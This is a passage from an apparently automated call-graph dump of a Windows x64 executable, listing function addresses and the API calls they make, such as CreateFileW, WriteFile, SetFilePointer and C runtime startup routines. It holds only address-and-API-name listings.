calls 38831->38900 38832 7ff6185c3c45 38835 7ff6185c3c54 38832->38835 38894 7ff6185dcba8 75 API calls 38832->38894 38895 7ff6185ca9d4 186 API calls wcschr 38835->38895 38836 7ff6185c3cf9 38901 7ff6185e1998 138 API calls 38836->38901 38840 7ff6185c3c5c 38896 7ff6185c93ac 8 API calls 38840->38896 38841 7ff6185c3d10 38902 7ff6185e18ac 38841->38902 38844 7ff6185c3c66 38845 7ff6185c3c77 38844->38845 38897 7ff6185dca40 61 API calls _CxxThrowException 38844->38897 38898 7ff6185c8090 8 API calls 38845->38898 38849 7ff6185c3c7f 38849->38826 38899 7ff6185dca40 61 API calls _CxxThrowException 38849->38899 38871 7ff6185e1e95 setbuf 38870->38871 38872 7ff6185e1ecb CreateFileW 38871->38872 38873 7ff6185e1fb8 38872->38873 38874 7ff6185e1f59 GetLastError 38872->38874 38875 7ff6185e1ff7 38873->38875 38877 7ff6185e1fd9 SetFileTime 38873->38877 38876 7ff6185f4534 10 API calls 38874->38876 38879 7ff61861a610 _handle_error 8 API calls 38875->38879 38878 7ff6185e1f74 38876->38878 38877->38875 38878->38873 38880 7ff6185e1f78 CreateFileW GetLastError 38878->38880 38881 7ff6185e203a 38879->38881 38880->38873 38881->38824 38910 7ff6185e24e8 38882->38910 38885 7ff6185e240e 38885->38831 38888 7ff6185e1c3b 38887->38888 38889 7ff6185e1c37 38887->38889 38888->38889 38890 7ff6185e1c5d 38888->38890 38889->38821 38927 7ff6185e2d6c 12 API calls 2 library calls 38890->38927 38892->38828 38893->38832 38895->38840 38896->38844 38897->38845 38898->38849 38899->38826 38900->38836 38901->38841 38903 7ff6185e18db 38902->38903 38904 7ff6185e18ca 38902->38904 38903->38826 38904->38903 38905 7ff6185e18de 38904->38905 38906 7ff6185e18d6 38904->38906 38928 7ff6185e1930 38905->38928 38907 7ff6185e1c24 12 API calls 38906->38907 38907->38903 38916 7ff6185e1af0 38910->38916 38913 7ff6185e23f9 38913->38885 38915 7ff6185dca40 61 API calls _CxxThrowException 38913->38915 38915->38885 38917 7ff6185e1b01 setbuf 38916->38917 38918 7ff6185e1b6f CreateFileW 38917->38918 38919 7ff6185e1b68 38917->38919 38918->38919 38920 7ff6185e1be1 38919->38920 38921 7ff6185f4534 10 API calls 38919->38921 38924 7ff61861a610 _handle_error 8 API calls 38920->38924 38922 7ff6185e1bb3 38921->38922 38922->38920 38923 7ff6185e1bb7 CreateFileW 38922->38923 38923->38920 38925 7ff6185e1c14 38924->38925 38925->38913 38926 7ff6185dca08 10 API calls 38925->38926 38926->38913 38927->38889 38929 7ff6185e194c 38928->38929 38930 7ff6185e1964 38928->38930 38929->38930 38932 7ff6185e1958 CloseHandle 38929->38932 38931 7ff6185e1988 38930->38931 38934 7ff6185dc9d0 10 API calls 38930->38934 38931->38903 38932->38930 38934->38931 38935 7ff6185c82f0 38936 7ff6185c8306 38935->38936 38949 7ff6185c836f 38935->38949 38937 7ff6185c8324 38936->38937 38940 7ff6185c8371 38936->38940 38936->38949 39055 7ff6185e2414 61 API calls 38937->39055 38939 7ff6185c8347 39056 7ff6185e1998 138 API calls 38939->39056 38940->38949 39057 7ff6185e1998 138 API calls 38940->39057 38943 7ff6185c835e 38944 7ff6185e18ac 15 API calls 38943->38944 38944->38949 38948 7ff6185c8578 38950 7ff6185cb540 147 API calls 38948->38950 38958 7ff6185ca410 38949->38958 38955 7ff6185c858f 38950->38955 38951 7ff6185cb540 147 API calls 38951->38948 38952 7ff6185c8634 38953 7ff61861a610 _handle_error 8 API calls 38952->38953 38954 7ff6185c8663 38953->38954 38955->38952 39058 7ff6185c9628 175 API calls 38955->39058 39059 7ff6185f7a68 38958->39059 38961 7ff6185c853a 38963 7ff6185cb540 38961->38963 38967 7ff6185cb55f setbuf 38963->38967 38964 7ff6185cb5a1 38965 7ff6185cb5d8 38964->38965 38966 7ff6185cb5b8 38964->38966 39207 7ff6185f8c1c 38965->39207 39093 7ff6185caba0 38966->39093 38967->38964 39089 7ff6185ca4d0 38967->39089 38970 7ff61861a610 _handle_error 8 API calls 38971 7ff6185c854f 38970->38971 38971->38948 38971->38951 38972 7ff6185cb67f 38973 7ff6185cbc91 38972->38973 38975 7ff6185cb6a5 38972->38975 38976 7ff6185cbbae 38972->38976 38974 7ff6185cb5d3 38973->38974 38977 7ff6185e2574 126 API calls 38973->38977 38974->38970 38975->38974 38986 7ff6185cb6b5 38975->38986 39000 7ff6185cb79f 38975->39000 38978 7ff6185f8d00 48 API calls 38976->38978 38977->38974 38980 7ff6185cbc5c 38978->38980 39276 7ff6185f8d38 48 API calls 38980->39276 38984 7ff6185cbc69 39277 7ff6185f8d38 48 API calls 38984->39277 38986->38974 39241 7ff6185f8d00 38986->39241 38988 7ff6185cbc76 39278 7ff6185f8d38 48 API calls 38988->39278 38990 7ff6185cbc84 39279 7ff6185f8d88 48 API calls 38990->39279 38995 7ff6185cb726 39245 7ff6185f8d38 48 API calls 38995->39245 38997 7ff6185cb733 38998 7ff6185cb749 38997->38998 39246 7ff6185f8d88 48 API calls 38997->39246 39005 7ff6185cb75c 38998->39005 39247 7ff6185f8d38 48 API calls 38998->39247 39006 7ff6185cb8e5 39000->39006 39258 7ff6185cc3c8 CharLowerW CharUpperW 39000->39258 39002 7ff6185cb779 39248 7ff6185f8f94 39002->39248 39004 7ff6185f8d00 48 API calls 39004->39005 39005->39002 39005->39004 39259 7ff61860d840 WideCharToMultiByte 39006->39259 39010 7ff6185cb9a1 39011 7ff6185f8d00 48 API calls 39010->39011 39013 7ff6185cb9c4 39011->39013 39262 7ff6185f8d38 48 API calls 39013->39262 39015 7ff6185cb910 39015->39010 39261 7ff6185c945c 55 API calls _handle_error 39015->39261 39016 7ff6185cb9d1 39263 7ff6185f8d38 48 API calls 39016->39263 39018 7ff6185cb9de 39264 7ff6185f8d88 48 API calls 39018->39264 39020 7ff6185cb9eb 39265 7ff6185f8d88 48 API calls 39020->39265 39022 7ff6185cba0b 39023 7ff6185f8d00 48 API calls 39022->39023 39024 7ff6185cba27 39023->39024 39266 7ff6185f8d88 48 API calls 39024->39266 39026 7ff6185cba37 39027 7ff6185cba49 39026->39027 39267 7ff61860bc48 15 API calls 39026->39267 39268 7ff6185f8d88 48 API calls 39027->39268 39030 7ff6185cba59 39031 7ff6185f8d00 48 API calls 39030->39031 39032 7ff6185cba66 39031->39032 39033 7ff6185f8d00 48 API calls 39032->39033 39034 7ff6185cba78 39033->39034 39269 7ff6185f8d38 48 API calls 39034->39269 39036 7ff6185cba85 39270 7ff6185f8d88 48 API calls 39036->39270 39038 7ff6185cba92 39039 7ff6185cbacd 39038->39039 39271 7ff6185f8d88 48 API calls 39038->39271 39273 7ff6185f8e3c 39039->39273 39041 7ff6185cbab2 39272 7ff6185f8d88 48 API calls 39041->39272 39044 7ff6185cbb33 39046 7ff6185cbb53 39044->39046 39050 7ff6185f8e3c 48 API calls 39044->39050 39051 7ff6185cbb6e 39046->39051 39052 7ff6185f8e3c 48 API calls 39046->39052 39047 7ff6185f8d00 48 API calls 39048 7ff6185cbb09 39047->39048 39048->39044 39049 7ff6185f8e3c 48 API calls 39048->39049 39049->39044 39050->39046 39053 7ff6185f8f94 126 API calls 39051->39053 39052->39051 39053->38974 39055->38939 39056->38943 39057->38949 39058->38952 39061 7ff6185f7a8d 39059->39061 39066 7ff6185ca434 39059->39066 39060 7ff6185f7aaf 39063 7ff6185e22e0 12 API calls 39060->39063 39060->39066 39061->39060 39072 7ff6185f7340 157 API calls 39061->39072 39064 7ff6185f7adf 39063->39064 39073 7ff6185e2440 39064->39073 39066->38961 39067 7ff6185e22e0 39066->39067 39083 7ff6185e20b4 39067->39083 39070 7ff6185e2307 39070->38961 39072->39060 39074 7ff6185e246a SetFilePointer 39073->39074 39076 7ff6185e2454 39073->39076 39075 7ff6185e24ad 39074->39075 39077 7ff6185e248d GetLastError 39074->39077 39075->39066 39076->39075 39081 7ff6185dcd00 10 API calls 39076->39081 39077->39075 39079 7ff6185e2497 39077->39079 39079->39075 39082 7ff6185dcd00 10 API calls 39079->39082 39084 7ff6185e2130 39083->39084 39087 7ff6185e20d0 39083->39087 39084->39070 39088 7ff6185dcd00 10 API calls 39084->39088 39085 7ff6185e2102 SetFilePointer 39085->39084 39086 7ff6185e2126 GetLastError 39085->39086 39086->39084 39087->39085 39090 7ff6185ca4ea 39089->39090 39091 7ff6185ca4ee 39090->39091 39092 7ff6185e2440 12 API calls 39090->39092 39091->38964 39092->39091 39094 7ff6185cabbf setbuf 39093->39094 39095 7ff6185f8c1c 48 API calls 39094->39095 39101 7ff6185cabf5 39095->39101 39096 7ff6185caca7 39097 7ff6185cb4af 39096->39097 39098 7ff6185cacbf 39096->39098 39102 7ff6185cb4ff 39097->39102 39104 7ff6185e2574 126 API calls 39097->39104 39099 7ff6185cb35c 39098->39099 39100 7ff6185cacc8 39098->39100 39106 7ff6185f8eec 48 API calls 39099->39106 39107 7ff6185cacdd 39100->39107 39114 7ff6185cad60 39100->39114 39137 7ff6185caea7 39100->39137 39101->39096 39101->39097 39103 7ff6185d9be0 14 API calls 39101->39103 39105 7ff6185f72c0 4 API calls 39102->39105 39108 7ff6185cac34 39103->39108 39104->39102 39105->39114 39109 7ff6185cb395 39106->39109 39110 7ff6185cace6 39107->39110 39111 7ff6185cad68 39107->39111 39112 7ff6185d90b8 75 API calls 39108->39112 39113 7ff6185cb3ad 39109->39113 39298 7ff6185c9e2c 48 API calls 39109->39298 39110->39114 39280 7ff6185f8eec 39110->39280 39118 7ff6185f8eec 48 API calls 39111->39118 39117 7ff6185cac8f 39112->39117 39116 7ff6185f8eec 48 API calls 39113->39116 39115 7ff61861a610 _handle_error 8 API calls 39114->39115 39121 7ff6185cb52b 39115->39121 39122 7ff6185cb3d4 39116->39122 39117->39096 39127 7ff6185e2574 126 API calls 39117->39127 39120 7ff6185cad9c 39118->39120 39124 7ff6185f8eec 48 API calls 39120->39124 39121->38974 39125 7ff6185cb3e6 39122->39125 39129 7ff6185f8eec 48 API calls 39122->39129 39128 7ff6185cada9 39124->39128 39132 7ff6185f8eec 48 API calls 39125->39132 39127->39096 39131 7ff6185f8eec 48 API calls 39128->39131 39129->39125 39130 7ff6185f8eec 48 API calls 39133 7ff6185cad31 39130->39133 39134 7ff6185cadb5 39131->39134 39140 7ff6185cb451 39132->39140 39135 7ff6185f8eec 48 API calls 39133->39135 39136 7ff6185f8eec 48 API calls 39134->39136 39138 7ff6185cad46 39135->39138 39139 7ff6185cadc2 39136->39139 39148 7ff6185cafda 39137->39148 39288 7ff6185c9b64 48 API calls _handle_error 39137->39288 39141 7ff6185f8f94 126 API calls 39138->39141 39146 7ff6185f8d00 48 API calls 39139->39146 39143 7ff6185cb471 39140->39143 39147 7ff6185f8eec 48 API calls 39140->39147 39141->39114 39142 7ff6185cb486 39145 7ff6185f8f94 126 API calls 39142->39145 39143->39142 39144 7ff6185f8e3c 48 API calls 39143->39144 39144->39142 39145->39114 39149 7ff6185cadcf 39146->39149 39147->39143 39157 7ff6185caff2 39148->39157 39289 7ff6185c9d98 48 API calls 39148->39289 39151 7ff6185d90b8 75 API calls 39149->39151 39153 7ff6185cae22 39151->39153 39154 7ff6185f8e3c 48 API calls 39153->39154 39155 7ff6185cae33 39154->39155 39156 7ff6185f8e3c 48 API calls 39155->39156 39160 7ff6185cae48 39156->39160 39159 7ff6185cb02b 39157->39159 39290 7ff6185c9efc 48 API calls _handle_error 39157->39290 39158 7ff6185cb0af 39163 7ff6185cb0c8 39158->39163 39292 7ff6185ca1a0 48 API calls 2 library calls 39158->39292 39159->39158 39291 7ff6185ca2c8 48 API calls 39159->39291 39167 7ff618609ce4 8 API calls 39160->39167 39164 7ff6185cb0e2 39163->39164 39293 7ff6185ca350 48 API calls _handle_error 39163->39293 39169 7ff6185f8eec 48 API calls 39164->39169 39168 7ff6185cae60 39167->39168 39170 7ff618609b70 8 API calls 39168->39170 39171 7ff6185cb0fc 39169->39171 39172 7ff6185cae6d 39170->39172 39173 7ff6185f8eec 48 API calls 39171->39173 39174 7ff6185f8e3c 48 API calls 39172->39174 39175 7ff6185cb109 39173->39175 39176 7ff6185cae80 39174->39176 39177 7ff6185cb11f 39175->39177 39179 7ff6185f8eec 48 API calls 39175->39179 39178 7ff6185f8f94 126 API calls 39176->39178 39284 7ff6185f8e94 39177->39284 39178->39114 39179->39177 39182 7ff6185f8eec 48 API calls 39183 7ff6185cb147 39182->39183 39184 7ff6185f8e94 48 API calls 39183->39184 39185 7ff6185cb15f 39184->39185 39186 7ff6185f8eec 48 API calls 39185->39186 39189 7ff6185cb16c 39186->39189 39187 7ff6185cb18a 39188 7ff6185cb1a9 39187->39188 39295 7ff6185f8d88 48 API calls 39187->39295 39191 7ff6185f8e94 48 API calls 39188->39191 39189->39187 39294 7ff6185f8d88 48 API calls 39189->39294 39193 7ff6185cb1bc 39191->39193 39194 7ff6185f8eec 48 API calls 39193->39194 39195 7ff6185cb1d6 39194->39195 39197 7ff6185cb1e9 39195->39197 39296 7ff6185cc3c8 CharLowerW CharUpperW 39195->39296 39197->39197 39198 7ff6185f8eec 48 API calls 39197->39198 39199 7ff6185cb21f 39198->39199 39200 7ff6185f8e3c 48 API calls 39199->39200 39201 7ff6185cb230 39200->39201 39202 7ff6185cb247 39201->39202 39203 7ff6185f8e3c 48 API calls 39201->39203 39204 7ff6185f8f94 126 API calls 39202->39204 39203->39202 39205 7ff6185cb278 39204->39205 39205->39114 39297 7ff6185f70d8 4 API calls 2 library calls 39205->39297 39299 7ff6185f8f28 39207->39299 39210 7ff6185d90b8 39211 7ff6185d9123 39210->39211 39218 7ff6185d91a9 39210->39218 39211->39218 39317 7ff618607e74 39211->39317 39213 7ff61861a610 _handle_error 8 API calls 39214 7ff6185cb66e 39213->39214 39226 7ff6185e2574 39214->39226 39216 7ff61860d840 WideCharToMultiByte 39217 7ff6185d9157 39216->39217 39217->39218 39219 7ff6185d91c4 39217->39219 39220 7ff6185d916a 39217->39220 39218->39213 39336 7ff6185d9338 12 API calls _handle_error 39219->39336 39222 7ff6185d91ab 39220->39222 39223 7ff6185d916f 39220->39223 39335 7ff6185d951c 71 API calls _handle_error 39222->39335 39223->39218 39321 7ff6185d98b0 39223->39321 39227 7ff6185e25a5 39226->39227 39228 7ff6185e259e 39226->39228 39229 7ff6185e25ab GetStdHandle 39227->39229 39232 7ff6185e25ba 39227->39232 39228->38972 39229->39232 39230 7ff6185e2619 WriteFile 39230->39232 39231 7ff6185e25cf WriteFile 39231->39232 39233 7ff6185e260b 39231->39233 39232->39228 39232->39230 39232->39231 39234 7ff6185e2658 GetLastError 39232->39234 39239 7ff6185e2721 39232->39239 39401 7ff6185e3144 9 API calls 2 library calls 39232->39401 39402 7ff6185dcf34 10 API calls 39232->39402 39403 7ff6185dc95c 126 API calls 39232->39403 39233->39231 39233->39232 39234->39232 39236 7ff6185e2684 SetLastError 39236->39232 39404 7ff6185dcf14 10 API calls 39239->39404 39242 7ff6185c161c 48 API calls 39241->39242 39243 7ff6185cb719 39242->39243 39244 7ff6185f8d38 48 API calls 39243->39244 39244->38995 39245->38997 39246->38998 39247->39005 39249 7ff6185f9131 39248->39249 39250 7ff6185f8fcf 39248->39250 39249->38974 39257 7ff6185f905d 39250->39257 39405 7ff6185dca6c 48 API calls 3 library calls 39250->39405 39251 7ff6185f90e0 39251->39249 39252 7ff6185e2574 126 API calls 39251->39252 39252->39249 39253 7ff6185c161c 48 API calls 39253->39251 39255 7ff6185f904c 39406 7ff6185dca40 61 API calls _CxxThrowException 39255->39406 39257->39251 39257->39253 39258->39006 39260 7ff6185cb8f8 CharToOemA 39259->39260 39260->39015 39261->39010 39262->39016 39263->39018 39264->39020 39265->39022 39266->39026 39267->39027 39268->39030 39269->39036 39270->39038 39271->39041 39272->39039 39274 7ff6185c161c 48 API calls 39273->39274 39275 7ff6185cbaf2 39274->39275 39275->39044 39275->39047 39275->39048 39276->38984 39277->38988 39278->38990 39279->38973 39281 7ff6185f8efc 39280->39281 39282 7ff6185f8d00 48 API calls 39281->39282 39283 7ff6185cad24 39281->39283 39282->39281 39283->39130 39285 7ff6185f8eac 39284->39285 39286 7ff6185f8d00 48 API calls 39285->39286 39287 7ff6185cb137 39285->39287 39286->39285 39287->39182 39288->39148 39289->39157 39290->39159 39291->39158 39292->39163 39293->39164 39294->39187 39295->39188 39296->39197 39297->39114 39298->39113 39302 7ff6185c161c 39299->39302 39301 7ff6185cb601 39301->38972 39301->38973 39301->39210 39303 7ff6185c1640 39302->39303 39312 7ff6185c16aa memcpy_s 39302->39312 39304 7ff6185c166d 39303->39304 39313 7ff6185dca6c 48 API calls 3 library calls 39303->39313 39308 7ff6185c16d4 39304->39308 39309 7ff6185c168e 39304->39309 39306 7ff6185c1661 39314 7ff6185dcb64 8 API calls 39306->39314 39308->39312 39316 7ff6185dcb64 8 API calls 39308->39316 39309->39312 39315 7ff6185dcb64 8 API calls 39309->39315 39312->39301 39313->39306 39318 7ff6185d9143 39317->39318 39319 7ff618607e95 39317->39319 39318->39216 39320 7ff618607ec8 68 API calls 39319->39320 39320->39318 39322 7ff6185d9b45 39321->39322 39326 7ff6185d9920 39321->39326 39323 7ff61861a610 _handle_error 8 API calls 39322->39323 39324 7ff6185d9b61 39323->39324 39324->39218 39327 7ff6185d996d 39326->39327 39328 7ff6185d9b75 39326->39328 39337 7ff618607da8 39326->39337 39327->39327 39344 7ff6185da0f4 39327->39344 39330 7ff618607f24 68 API calls 39328->39330 39332 7ff6185d9acb 39330->39332 39331 7ff6185d99d0 39331->39331 39360 7ff618607f24 39331->39360 39332->39322 39374 7ff618604ea8 8 API calls _handle_error 39332->39374 39335->39218 39336->39218 39338 7ff618607e74 68 API calls 39337->39338 39339 7ff618607ddc 39338->39339 39340 7ff618607e74 68 API calls 39339->39340 39341 7ff618607def 39340->39341 39342 7ff61861a610 _handle_error 8 API calls 39341->39342 39343 7ff618607e43 39342->39343 39343->39326 39348 7ff6185da15c memcpy_s 39344->39348 39345 7ff6185da358 39397 7ff61861a774 8 API calls __report_securityfailure 39345->39397 39347 7ff6185da352 39396 7ff61861a774 8 API calls __report_securityfailure 39347->39396 39348->39345 39348->39347 39351 7ff6185da192 39348->39351 39352 7ff6185da34d 39348->39352 39350 7ff6185da35e 39375 7ff6185d9dd8 39351->39375 39395 7ff61861a774 8 API calls __report_securityfailure 39352->39395 39355 7ff6185da1d9 39356 7ff6185d9dd8 8 API calls 39355->39356 39357 7ff6185da2f1 39355->39357 39356->39355 39358 7ff61861a610 _handle_error 8 API calls 39357->39358 39359 7ff6185da33b 39358->39359 39359->39331 39361 7ff618607f5e 39360->39361 39366 7ff618607fb5 39360->39366 39362 7ff61860b3f0 10 API calls 39361->39362 39361->39366 39363 7ff618607f72 39362->39363 39363->39366 39367 7ff618607f7e GetProcAddressForCaller GetProcAddress 39363->39367 39364 7ff61860805c GetCurrentProcessId 39365 7ff618608034 39364->39365 39365->39332 39366->39364 39368 7ff618607ff1 39366->39368 39367->39366 39368->39365 39398 7ff6185dca6c 48 API calls 3 library calls 39368->39398 39370 7ff61860801f 39399 7ff6185dcda4 10 API calls 2 library calls 39370->39399 39372 7ff618608027 39400 7ff6185dca40 61 API calls _CxxThrowException 39372->39400 39374->39322 39376 7ff6185d9e46 39375->39376 39377 7ff6185d9e6e memcpy_s 39375->39377 39378 7ff618609ce4 8 API calls 39376->39378 39380 7ff6185d9e85 39377->39380 39384 7ff618609ce4 8 API calls 39377->39384 39379 7ff6185d9e5e 39378->39379 39382 7ff618609b70 8 API calls 39379->39382 39381 7ff618609ce4 8 API calls 39380->39381 39383 7ff6185d9f97 39381->39383 39382->39377 39385 7ff618609b70 8 API calls 39383->39385 39384->39380 39386 7ff6185d9fa8 memcpy_s 39385->39386 39387 7ff6185d9fb4 39386->39387 39389 7ff618609ce4 8 API calls 39386->39389 39388 7ff618609ce4 8 API calls 39387->39388 39390 7ff6185da0bb 39388->39390 39389->39387 39391 7ff618609b70 8 API calls 39390->39391 39392 7ff6185da0c9 39391->39392 39393 7ff61861a610 _handle_error 8 API calls 39392->39393 39394 7ff6185da0d8 39393->39394 39394->39355 39395->39347 39396->39345 39397->39350 39398->39370 39399->39372 39400->39365 39401->39236 39403->39232 39405->39255 39406->39257 39407 7ff61862231c 39408 7ff61862238c 39407->39408 39409 7ff618622342 GetModuleHandleW 39407->39409 39420 7ff618626938 EnterCriticalSection 39408->39420 39409->39408 39415 7ff61862234f 39409->39415 39411 7ff618622410 39412 7ff618626998 fflush LeaveCriticalSection 39411->39412 39414 7ff618622460 39412->39414 39413 7ff618622396 39413->39411 39417 7ff6186243b8 16 API calls 39413->39417 39416 7ff618622488 11 API calls 39414->39416 39419 7ff61862246c 39414->39419 39415->39408 39421 7ff6186224d4 GetModuleHandleExW 39415->39421 39416->39419 39417->39411 39422 7ff6186224fe GetProcAddress 39421->39422 39423 7ff618622525 39421->39423 39422->39423 39426 7ff618622518 39422->39426 39424 7ff61862252f FreeLibrary 39423->39424 39425 7ff618622535 39423->39425 39424->39425 39425->39408 39426->39423 39427 7ff61861b0fc 39446 7ff61861aa8c 39427->39446 39431 7ff61861b148 39436 7ff61861b169 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 39431->39436 39454 7ff61862472c 39431->39454 39432 7ff61861b123 __scrt_acquire_startup_lock 39432->39431 39502 7ff61861b52c 7 API calls memcpy_s 39432->39502 39435 7ff61861b16d 39436->39435 39437 7ff61861b1f7 39436->39437 39503 7ff618622574 35 API calls __InternalCxxFrameHandler 39436->39503 39458 7ff618623fc4 39437->39458 39444 7ff61861b220 39504 7ff61861ac64 8 API calls 2 library calls 39444->39504 39447 7ff61861aaae __isa_available_init 39446->39447 39505 7ff61861e2f8 39447->39505 39450 7ff61861aab7 39450->39432 39501 7ff61861b52c 7 API calls memcpy_s 39450->39501 39456 7ff618624744 39454->39456 39455 7ff618624766 39455->39436 39456->39455 39554 7ff61861b010 39456->39554 39459 7ff618623fd4 39458->39459 39461 7ff61861b20c 39458->39461 39646 7ff618623c84 39459->39646 39462 7ff6185f7e20 39461->39462 39686 7ff61860b470 GetModuleHandleW 39462->39686 39468 7ff6185f7e58 SetErrorMode GetModuleHandleW 39469 7ff6186048cc 21 API calls 39468->39469 39470 7ff6185f7e7d 39469->39470 39471 7ff618603e48 137 API calls 39470->39471 39472 7ff6185f7e90 39471->39472 39473 7ff6185d3d3c 126 API calls 39472->39473 39474 7ff6185f7e9c 39473->39474 39475 7ff61861a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39474->39475 39476 7ff6185f7ead 39475->39476 39477 7ff6185f7ebf 39476->39477 39478 7ff6185d3f18 70 API calls 39476->39478 39479 7ff6185d4d1c 157 API calls 39477->39479 39478->39477 39480 7ff6185f7ed6 39479->39480 39481 7ff6185f7eef 39480->39481 39482 7ff6185d6ad0 154 API calls 39480->39482 39483 7ff6185d4d1c 157 API calls 39481->39483 39484 7ff6185f7ee7 39482->39484 39485 7ff6185f7eff 39483->39485 39486 7ff6185d4e48 160 API calls 39484->39486 39487 7ff6185f7f0d 39485->39487 39489 7ff6185f7f14 39485->39489 39486->39481 39488 7ff61860b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39487->39488 39488->39489 39490 7ff6185d4888 58 API calls 39489->39490 39491 7ff6185f7f57 39490->39491 39492 7ff6185d4fd0 268 API calls 39491->39492 39493 7ff6185f7f5f 39492->39493 39494 7ff6185f7f9e 39493->39494 39495 7ff6185f7f8c 39493->39495 39499 7ff61861b684 GetModuleHandleW 39494->39499 39496 7ff61860b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39495->39496 39497 7ff6185f7f93 39496->39497 39497->39494 39498 7ff61860b57c 14 API calls 39497->39498 39498->39494 39500 7ff61861b698 39499->39500 39500->39444 39501->39432 39502->39431 39503->39437 39504->39435 39506 7ff61861e301 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 39505->39506 39518 7ff61861eb08 39506->39518 39509 7ff61861aab3 39509->39450 39513 7ff6186245e4 39509->39513 39511 7ff61861e318 39511->39509 39525 7ff61861eb50 DeleteCriticalSection 39511->39525 39514 7ff618629d4c 39513->39514 39515 7ff61861aac0 39514->39515 39542 7ff6186266c0 39514->39542 39515->39450 39517 7ff61861e32c 8 API calls 3 library calls 39515->39517 39517->39450 39519 7ff61861eb10 39518->39519 39521 7ff61861eb41 39519->39521 39522 7ff61861e30b 39519->39522 39526 7ff61861e678 39519->39526 39531 7ff61861eb50 DeleteCriticalSection 39521->39531 39522->39509 39524 7ff61861e8a4 8 API calls 3 library calls 39522->39524 39524->39511 39525->39509 39532 7ff61861e34c 39526->39532 39529 7ff61861e6cf InitializeCriticalSectionAndSpinCount 39530 7ff61861e6bb 39529->39530 39530->39519 39531->39522 39533 7ff61861e3b2 39532->39533 39536 7ff61861e3ad 39532->39536 39533->39529 39533->39530 39534 7ff61861e3e5 LoadLibraryExW 39534->39536 39537 7ff61861e40b GetLastError 39534->39537 39535 7ff61861e489 GetProcAddress 39535->39533 39539 7ff61861e4a1 39535->39539 39536->39533 39536->39534 39538 7ff61861e47a 39536->39538 39541 7ff61861e458 FreeLibrary 39536->39541 39537->39536 39540 7ff61861e416 LoadLibraryExW 39537->39540 39538->39533 39538->39535 39539->39533 39540->39536 39541->39536 39553 7ff618626938 EnterCriticalSection 39542->39553 39544 7ff6186266d0 39545 7ff618628050 32 API calls 39544->39545 39546 7ff6186266d9 39545->39546 39548 7ff6186264d0 34 API calls 39546->39548 39552 7ff6186266e7 39546->39552 39547 7ff618626998 fflush LeaveCriticalSection 39549 7ff6186266f3 39547->39549 39550 7ff6186266e2 39548->39550 39549->39514 39551 7ff6186265bc GetStdHandle GetFileType 39550->39551 39551->39552 39552->39547 39555 7ff61861b020 pre_c_initialization 39554->39555 39575 7ff618622b00 39555->39575 39557 7ff61861b02c pre_c_initialization 39581 7ff61861aad8 39557->39581 39559 7ff61861b045 39560 7ff61861b049 _RTC_Initialize 39559->39560 39561 7ff61861b0b5 39559->39561 39586 7ff61861ace0 39560->39586 39618 7ff61861b52c 7 API calls memcpy_s 39561->39618 39563 7ff61861b0bf 39619 7ff61861b52c 7 API calls memcpy_s 39563->39619 39565 7ff61861b05a pre_c_initialization 39589 7ff618623b0c 39565->39589 39567 7ff61861b0ca __scrt_initialize_default_local_stdio_options 39567->39456 39570 7ff61861b06a 39617 7ff61861b7dc RtlInitializeSListHead 39570->39617 39572 7ff61861b06f pre_c_initialization __InternalCxxFrameHandler 39573 7ff618624818 pre_c_initialization 35 API calls 39572->39573 39574 7ff61861b09a pre_c_initialization 39573->39574 39574->39456 39576 7ff618622b11 39575->39576 39577 7ff618622b19 39576->39577 39620 7ff618624f3c 15 API calls memcpy_s 39576->39620 39577->39557 39579 7ff618622b28 39621 7ff618624e1c 31 API calls _invalid_parameter_noinfo 39579->39621 39582 7ff61861ab96 39581->39582 39585 7ff61861aaf0 __scrt_initialize_onexit_tables __scrt_acquire_startup_lock 39581->39585 39622 7ff61861b52c 7 API calls memcpy_s 39582->39622 39584 7ff61861aba0 39585->39559 39623 7ff61861ac90 39586->39623 39588 7ff61861ace9 39588->39565 39590 7ff618623b2a 39589->39590 39591 7ff618623b40 39589->39591 39628 7ff618624f3c 15 API calls memcpy_s 39590->39628 39630 7ff618629370 39591->39630 39595 7ff618623b2f 39629 7ff618624e1c 31 API calls _invalid_parameter_noinfo 39595->39629 39596 7ff618623b72 39634 7ff6186238ec 35 API calls pre_c_initialization 39596->39634 39598 7ff61861b066 39598->39563 39598->39570 39600 7ff618623b9c 39635 7ff618623aa8 15 API calls __vcrt_getptd_noexit 39600->39635 39602 7ff618623bb2 39603 7ff618623bcb 39602->39603 39604 7ff618623bba 39602->39604 39637 7ff6186238ec 35 API calls pre_c_initialization 39603->39637 39636 7ff618624f3c 15 API calls memcpy_s 39604->39636 39607 7ff618624a74 __vcrt_getptd_noexit 15 API calls 39607->39598 39608 7ff618623be7 39609 7ff618623c17 39608->39609 39610 7ff618623c30 39608->39610 39615 7ff618623bbf 39608->39615 39638 7ff618624a74 39609->39638 39613 7ff618624a74 __vcrt_getptd_noexit 15 API calls 39610->39613 39612 7ff618623c20 39614 7ff618624a74 __vcrt_getptd_noexit 15 API calls 39612->39614 39613->39615 39616 7ff618623c2c 39614->39616 39615->39607 39616->39598 39618->39563 39619->39567 39620->39579 39621->39577 39622->39584 39624 7ff61861acbf 39623->39624 39626 7ff61861acb5 _onexit 39623->39626 39627 7ff618624434 34 API calls _onexit 39624->39627 39626->39588 39627->39626 39628->39595 39629->39598 39631 7ff61862937d 39630->39631 39632 7ff618623b45 GetModuleFileNameA 39630->39632 39644 7ff6186291b0 48 API calls 4 library calls 39631->39644 39632->39596 39634->39600 39635->39602 39636->39615 39637->39608 39639 7ff618624a79 RtlFreeHeap 39638->39639 39640 7ff618624aa9 __vcrt_getptd_noexit 39638->39640 39639->39640 39641 7ff618624a94 39639->39641 39640->39612 39645 7ff618624f3c 15 API calls memcpy_s 39641->39645 39643 7ff618624a99 GetLastError 39643->39640 39644->39632 39645->39643 39647 7ff618623c98 39646->39647 39651 7ff618623ca1 39646->39651 39647->39651 39652 7ff618623ccc 39647->39652 39651->39461 39653 7ff618623ce5 39652->39653 39662 7ff618623caa 39652->39662 39654 7ff618629370 pre_c_initialization 48 API calls 39653->39654 39655 7ff618623cea 39654->39655 39665 7ff61862978c GetEnvironmentStringsW 39655->39665 39658 7ff618623cf7 39660 7ff618624a74 __vcrt_getptd_noexit 15 API calls 39658->39660 39660->39662 39661 7ff618623d04 39663 7ff618624a74 __vcrt_getptd_noexit 15 API calls 39661->39663 39662->39651 39664 